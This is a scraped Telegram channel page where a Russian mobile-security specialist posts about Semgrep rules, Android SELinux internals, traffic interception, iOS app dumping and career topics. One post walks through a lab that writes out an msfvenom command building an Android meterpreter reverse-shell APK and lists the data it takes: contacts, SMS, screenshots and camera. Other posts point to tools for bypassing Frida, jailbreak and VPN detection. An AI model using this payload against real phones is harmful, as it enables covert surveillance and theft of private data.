es
Feedback
Дневник Комбеза

Дневник Комбеза

Ir al canal en Telegram

История одного Кибер Безопасника из маленького города в Сибири

Mostrar más
El país no está especificadoLa categoría no está especificada
688
Suscriptores
Sin datos24 horas
+107 días
+6430 días
Archivo de publicaciones
Semgrep Rules Последнее время мы с командой всё чаще задумывались о том, что mobsfscan в части своего Semgrep-компонента, мягко говоря, местами глючный и довольно ограниченый. А если попробовать найти достаточно полный набор Semgrep-правил для мобильных приложений, быстро выясняется, что хорошие правила разбросаны по всему необъятному интернету🔞 Поэтому мы решили собрать всё это в одном месте и создали репозиторий: https://github.com/Sib-Coder/semgrep-mobile-rules В нём постарались собрать максимально полный набор проверок для мобильных приложений и при этом избавиться от дубликатов. Будем очень рады вашей поддержке, новым правилам и идеям для развития репозитория. Давайте делать мобилки безопаснее вместе 😎

Пост для тех кто не боится Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?» Сегодня практическая работ
+2
Пост для тех кто не боится Очень часто слышу: «Да что с помощью ваших этих мобилок можно сделать?» Сегодня практическая работа именно для таких людей. Вам понадобится: - телефон; - Metasploit; - сеть с нормальной маршрутизацией; - навыки реверса APK — уровня детского сада достаточно. Первое, что вам нужно, — сделать APK со зловредным функционалом. Берём Metasploit и вперёд:
 bash
msfvenom -p android/meterpreter/reverse_tcp lhost=<сюда пишете IP своего ноута> lport=8888 > $PWD/Downloads/msf.apk
Дальше берёте APK, который у вас получился, и делаете так, чтобы команда adb install сработала: в паре мест патчите полученный APK и подписываете его. Не привожу полный гайд, чтобы кто попало не начал устраивать слежку за своими одноклассницами. Они и без моей помощи найдут способы для буллинга. Дальше — msfconsole, запускаем приложение на телефоне. В результате мы можем наблюдать, что даже при условии, что приложение собрано не под самую новую ОС Android, нам есть что взять с телефона: - список контактов; - SMS — даже отправить можно: я так кинул денег другу за шаурму; - скриншоты; - доступ к камере; - ... Как итог: на мой взгляд, получилась весьма показательная лаба для тех, кто говорит, что из МП ничего сделать нельзя. Советую повторить данное упражнение со своими коллегами. Ну или хотя бы покажите им этот пост :)

Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂
+1
Традиционное ежегодное мероприятие по получению джеилбрейков объявляется открытым😂

Нигде не безопасно. Из всех "чайников" мы уже знаем, что существует OWASP top 10 для веб-приложений, но многие ли из вас задумывались, есть ли пересечения с мобилками? А задуматься стоит, ведь мобильное приложение - это по сути тот же веб. Собственно, статья про корреляцию уязвимостей на вебе и мобилках и уникальные проблемы, а так же разбор этих уязвимостей в коде и на схемах. Кто дочитает до конца: 1 - преисполнится 2 - найдёт практический чек-лист 3 - список дополнительной литературы для погружения #AppSec #Pentest 🧠 Кибер ПТУ | 👨‍🏫 Менторство ИБ 📂 Другие каналы

+1
Прочитал книгу «Проект “Феникс”. Роман о том, как DevOps меняет бизнес к лучшему» Это очень понятная история о том, зачем вообще нужны процессы и почему без них любая команда рано или поздно начинает тонуть в хаосе. Главная мысль, которую я вынес: процессы — это не бюрократия ради бюрократии. Нормально построенный процесс помогает команде быстрее двигаться, меньше тушить пожары и лучше понимать, какую ценность она реально приносит бизнесу. Книга хорошо показывает, что IT существует не само по себе. Любая задача, релиз, багфикс или изменение в инфраструктуре должны быть связаны с бизнес-целями: деньгами, скоростью, надежностью, пользовательским опытом, снижением рисков. И отдельно мне понравилось, как через сюжет становится понятно, зачем бизнесу нужна команда безопасности. Безопасность — это не команда, которая приходит в конце и говорит: «Нет, так нельзя». В идеальном мире безопасность помогает строить процессы так, чтобы продукт развивался быстро, но при этом не создавал критичные риски для компании, клиентов и данных. Очень советую к прочтению всем кому интересно понять: как моя работа влияет на бизнес...

Android SELinux Internals Part II: домены, отказы, обходы Ребята из 8ksec наконец-то выпустили вторую часть серии про SELinux на Android! Первая часть была про основы: контексты, чтение политик, sepolicy-inject. Вторая уже про то, как это всё работает в реальности. Разбирается вся цепочка от сертификата подписи APK до SELinux-домена, роль Zygote, как работает installd. Добавили практики: chcon, runcon, как работает magiskpolicy под капотом, чем принципиально отличаются подходы Magisk, KernelSU и APatch. Очень сочная и большая статья для любителей мякотки и чтоб погрузиться поглубже в то, как и что устроено внутри. Ну и анонсированная третья часть обещает быть ещё интереснее: kernel-level техники отключения SELinux и разбор реальных CVE. Что сказать, ждем :) #Android #SELinux #Pentest #Research #Kernel #Tools

Сраный Burp… Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходи
Сраный Burp… Самое неприятное в пентесте мобилок — когда приложение не работает из твоей страны, но посмотреть, куда оно ходит и какие API дёргает, всё равно надо. Мы с коллегой пентестили Flutter-приложение, и мне досталась iOS-часть. А это значит: pinning, сертификаты, прокси, VPN и немного боли.
Сначала собрали схему через Burp:
iPhone → OpenVPN → iptables DNAT → Burp → интернет
Трафик заворачивался, tcpdump показывал, что пакеты доходят, сертификаты подменялись, curl проходил. Но трафик не отображался... После часа дебага стало понятно: проблема не в OpenVPN, не в iptables и не в маршрутах. Просто Burp опять решил пожить своей жизнью и периодически не прогонял через себя весь трафик.
В итоге переехали на более простую схему:
iPhone → OpenVPN → iptables REDIRECT → mitmproxy → WireGuard → интернет
Поднял mitmweb прямо на OpenVPN-сервере, завернул 80/443 с iPhone локально на 8080, а сам сервер выпустили наружу через wg0. Понятно что после этого надо было бы похукать пару функций через frida, но в этот раз повезло и разрабы не заморачивались. Схему, как собрать такое окружение, приложу ниже. Кстати этот метод работает на многих приложениях так как мало кто научился от него нормально защищаться.

iDump: замена frida-ios-dump без Python (но с блекджеком и обходами) Если кому-то нужно было когда-нибудь сдампить приложение с iOS трубки, то первое, что приходит на ум - классический frida-ios-dump. Но с Frida 17+ он сломался и, судя по всему, уже не починится. И вот появился iDump - переосмысление того же подхода, но без всей той боли с pip, зависимостями, правильное версией Python и тд Автор этого шикарного тула - широко известный в узких кругах @OxFi5t, спасибо ему за это! Написан на Go с использованием frida-go, и главная идея это автономность. Один самодостаточный бинарь, который уже содержит в себе Frida-агент. Скопировал в PATH и работает. Техника та же, что у оригинала: инжектим агент, патчим cryptid, вытаскиваем расшифрованные сегменты Mach-O, собираем валидный IPA. Только без лишних телодвижений 🤓 Из приятного: - поддержка батч-дампинга (можно сразу несколько приложений или вообще `--dump-all`) - фильтрация по bundle ID - пропуск системных приложений Apple Передача файлов идёт через Frida messages напрямую — SSH не нужен (хотя SSH/SFTP режим тоже есть, если USB-трансфер медленный). Отдельно порадовал флаг --dodge - встроенный bypass для приложений, которые детектят Frida и падают до того, как агент успевает что-то сделать. Есть базовый вариант (хукает libc-символы: ptrace, sysctl и тд) и --dodge=advanced для особо упоротых приложений, которые делают raw syscalls и сканируют память на Frida-сигнатуры. Ну и возможность передать свой bypass-скрипт через --early, если встроенные не справляются. Так что тут можно еще и идеи по обходу джейлбрейка/фриды подсмотреть 😉 Очень рекомендую попробовать. Как по мне, давно нужна была нормальная замена 🔥 #iOS #Frida #ReverseEngineering #Tools #iDump

Я окончательно перестал играть в CTF. Причин, наверное, несколько. Последние полгода я постепенно отключался от этого процесса и переключался на вещи, которые сейчас кажутся мне более интересными и полезными. Для меня CTF всё ещё остаётся офигенным форматом практики. Особенно в обучении: когда мы разрабатываем курсы, тренинги или внутренние соревнования, CTF-задачи отлично помогают закреплять навыки руками. Но вот участвовать в CTF как игрок на постоянной основе мне больше не хочется. Проблема не в том, что формат плохой. Проблема в том, что многие соревнования, на мой взгляд, потеряли прежний шарм. Всё чаще игра превращается не в «думай, ломай, проверяй гипотезы», а в распинывание агента. Да, можно играть без Codex, Claude и всего остального зоопарка AI-инструментов. Можно. Но зачем? Если таски пишутся с помощью ИИ, решаются с помощью ИИ, а эксплойты подбираются за секунды, то игра без ИИ превращается просто в добровольную потерю 80% силы. А ведь раньше весь кайф CTF был как раз в другом. Ты сидишь, тупишь, скрипишь мозгами, пробуешь странные идеи, проваливаешься, снова пробуешь — и в какой-то момент сам приходишь к решению. Вот это чувство и было главным. А сейчас всё чаще выглядит так:
«Codex, тут сайт, походу SSTI вот в этом месте» Через несколько секунд: готовый эксплойт.
В 2021 году я кайфовал от каждого решённого таска. От каждого маленького продвижения. От момента, когда после нескольких часов тупняка что-то наконец сходилось, и ты такой: «А, вот оно». Сейчас этого ощущения стало сильно меньше. Наверное, просто стало неинтересно играть в игру, где всё чаще соревнуются не люди, а их агенты.

Мой пайплайн по анализу андроид приложений: Stage 0 — APK Metadata (apk-info): Мгновенный парсинг (~2мс) манифеста без декомпиляции: пакет, SDK-версии, все permissions, exported-компоненты, подписи (v1/v2/v3), security profile. Уже на этом этапе детектит: debuggable-флаг, v1-only подпись (уязвимость Janus, CVE-2017-13156), привилегированные системные permissions, exported ContentProvider'ы без защиты. Stage 1 — Декомпиляция + сканирование APK (параллельно): Всё запускается одновременно: • JADX — декомпиляция DEX → Java (8 потоков, 60-180с) • apktool — распаковка ресурсов, AndroidManifest.xml, нативных .so библиотек (5-15с) • dexfinder — поиск использования скрытых Android API + трассировка цепочек вызовов • Mariana Trench — taint-анализ потоков данных от Meta (source→sink) • Trueseeing — Dalvik bytecode scanner • Автодетект Flutter → Blutter (реверс Dart-кода), React Native → декомпиляция Hermes Stage 2 — Статический анализ (параллельно): • 184 regex-правила — быстрый pattern matching по декомпилированным исходникам • 331 semgrep-правило — AST-анализ (taint tracking, data flow) • Анализ Blutter pp.txt (Dart-символы для Flutter-приложений) • dexfinder call chain tracing — трассировка цепочек вызовов от exported-компонентов к уязвимым методам Stage 3 — Merge + фильтрация + обогащение: • Дедупликация по (rule_id, file, line) • SDK-фильтр (732 паттерна) — убирает 98% шума от Google, Firebase, OkHttp, Retrofit и ещё 150+ SDK • Классификация severity через RoBERTa модель • Аннотация exported-статуса: кросс-проверка finding → AndroidManifest → dexfinder reachability • RAG-обогащение каждого finding контекстом из базы знаний Stage 4 — LLM-анализ (6 агентов параллельно): Каждый агент — специалист в своей области, получает только релевантные findings + RAG-контекст: • Agent 1: Manifest + Attack Surface • Agent 2: Network + TLS • Agent 3: Auth + Cryptography • Agent 4: WebView + JS Bridge • Agent 5: Business Logic • Agent 6: Native Libraries • Agent 7 (Judge): валидирует CRITICAL/HIGH от всех агентов, отсекает false positives RAG Knowledge Base: • 9675 chunks в ChromaDB (гибридный поиск: BM25 + vector + RRF) • 1547+ отчётов из 18 источников: — OWASP MASTG: 120 (тестовые процедуры с примерами кода) — HackerOne: 170 (реальные bug bounty отчёты с PoC) — MITRE ATT&CK Mobile: 124 (техники атак, детекция, митигации) — Security blogs: 207 (Google, Zimperium, Lookout, Check Point) — Samsung Bulletins: 111 (Samsung-specific CVE) — NVD: 250 (CVE с CVSS) — Exploit-DB: 50 — Android Bulletins: 34 — CISA KEV: 23 — Собственные аудиты: 144 — Прочие: arXiv, VulCorpus (94 OWASP Top-10 сэмплов) • Граф знаний: 5597 узлов, 9213 связей (CVE↔️CWE↔️MITRE↔️MASTG) • 970+ code snippets в отдельном индексе

Опять ИИ Очень классное рассуждение на тему современных трендов связанных с ИИ. Главный тезис который понравился мне:
статистическое предсказание последовательностей и объяснение мира — не одно и то же. Человеческий интеллект важен не только тем, что продолжает паттерны, но и тем, что различает возможное и невозможное, строит каузальные объяснения и связывает высказывания с истиной, а не только с вероятностью.

Сила сопротивления - это ты и я... Не дадим наш любимый андроид в обиду 😎 https://keepandroidopen.org/ru/

Soft skills Я долго хотел про это написать , но не решался по разным причинам. Но последние события наконец-то четко сформировали моё представление о том что хотят от AppSec специалистов. Большая часть работы — это не «хакерство» и не поиск уязвимостей, а вполне себе менеджерская история. Да, где-то ещё живёт модель «нашли проблему — дали рекомендацию — дальше сами», но это скорее исключение. Берём банальный пример: SSL pinning в Android-приложении. Кажется, всё просто — network security config, OkHttp, хэши сертификатов, аккуратно разнести по коду. В теории — таска закрыта идём в бар. На практике — нет. Потому что почти всегда начинается «а давайте сделаем сложнее и надёжнее». Появляются кастомные механизмы, дополнительные проверки, обвязка. И вот вы сидите с пониманием что:
прототип отлично работает в тесте и внезапно разваливается на проде
Дальше начинается настоящая работа — не про уязвимости, а про доведение решения до конца: договариваться, объяснять, упрощать, балансировать между «безопасно» и «реально внедрить». И тут ключевая проблема: в 95% случаев только вы можете ответить на вопрос «зачем мы это делаем»🤯 А на вопрос «как сделать так, чтобы это не сломало продукт и не стоило лишних денег» — уже вы вместе с разработчиком 🤝 Но самое интересное — даже не в этом. Чтобы фича безопасности вообще доехала до прода, нужно выстроить процесс и ценности внутри команды. И это тоже зона ответственности AppSec. Поэтому правда простая:
AppSec — это в первую очередь менеджер. А уже потом — инженер безопасности.
P.S.: Возможно на уровне младших специалистов и кажется что вы всю жизнь будете только пентестить и триажить , но постепенно к вам придут такие темки 😁

Repost from N/a
A Glimpse into DexProtector Разбор сильной коммерческой защиты - это всегда захватывающее путешествие. Руки известного рисечера Romain Thomas на этот раз дошли до знаменитого DexProtector. Как он устроен внутри (и как его ломать) он рассказал в этом посте.

Ну такой контент пропускать нельзя

VPN-ы, VPN-Ы… Наткнулся вчера на очень годный ресёрч: https://github.com/Leeksov/ios-vpndetect-research В целом, я довольно скептически отношусь к тому, что сейчас происходит вокруг ограничений доступа к интернету. Но при этом понимаю, что есть люди, которым приходится это реализовывать. В исследовании разобрано: — какие российские приложения детектят VPN — и самое интересное — как именно они это делают Плюс автор сразу приложил твик для обхода 😎 Если вам нужны подобные механики — можно спокойно брать и вдохновляться. Ну и в целом, для общего развития — прям полезно. Ну и мысли о регуляторах будут вас тревожить меньше😮‍💨 Всем мира и свободного доступа в интернет🐦‍⬛️

Записали тут интересный ролик с одним хорошим человеком на тему безопасности наших с вами смартфонов. https://youtu.be/_rDdUEGZfko https://youtu.be/_rDdUEGZfko https://youtu.be/_rDdUEGZfko Ютуб – ссылка Рутуб здесь – ссылка А ВК Видео тут – ссылка С вас по традиции просмотр, лайк и душевный комментарий 🤝

Нужно ли специалисту ИБ идти в вуз? Наконец-то спустя больше месяца после моего выпуска из университета — обсудим эту инвестицию времени 😎 Если коротко: да, если хотите быть выше, чем обычный инженер. Во многих компаниях ситуация такая: если ты хочешь хоть за что-то отвечать — будь добр, имей высшее образование. А на некоторых должностях оно должно ещё и соответствовать определённому типу (например, специальности 10.05.x). Но если я хочу быть pentester, AppSec, ресёрчер? Тут вопрос, конечно, спорный. На уровне специалиста решают навыки — где вы их возьмёте, уже ваша головная боль. Универ не учит быть специалистом в области ИБ, но он учит добывать знания, решать проблемы и выполнять формальные требования. Плюс закладывает в голову базу, без которой сложно разбираться, как устроены те или иные инструменты — например, сканеры, строящие AST-деревья. Многие знакомые мне люди говорят, что в университете дают мало, и быстрее вы получите эти знания самостоятельно при практическом подходе (все, кто это говорил, в итоге закончили универ 😂). Да, это так. Но вопрос — где вы возьмёте задачи для работы с этим подходом? Я, например, в своё время совмещал два подхода: просил преподавателей по интересным мне предметам давать лабораторные с возможностью творческой реализации и «пострадать». Работало идеально 😁 Как итог: — Хотите руководить специалистами ИБ — диплом нужен — Хотите быть инженером — знания и навыки первостепенны Вспомнил, что один из моих руководителей рассказывал: у него был диплом другого профиля, но для получения определённой должности он прошёл повышение квалификации. И такие истории — не редкость 😄 Диплом для меня оказался не такой уж бесполезной бумажкой, хотя процесс его получения был, мягко говоря, непростым. P.S.: Пост написан по многочисленным вопросам, которые прилетали в личку на данную тему + не является рекомендацией по инвестициям 😂

Миллионы смартфонов Android оказались под угрозой взлома Специалист по безопасности Шарль Гийме за 45 секунд взломал смартфон
Миллионы смартфонов Android оказались под угрозой взлома Специалист по безопасности Шарль Гийме за 45 секунд взломал смартфон CMF Phone 1 на чипе MediaTek. Найденная уязвимость позволяет восстанавливать PIN-код и расшифровывать память даже на выключенных устройствах, потенциально затрагивая миллионы Android-смартфонов. В MediaTek подтвердили наличие логической ошибки, но присвоили бреши средний уровень опасности. Патчи были выпущены, случаев реальной эксплуатации уязвимости не зафиксировано. Теперь не нужно мучительно вспоминать пароль Join our club Cult 👁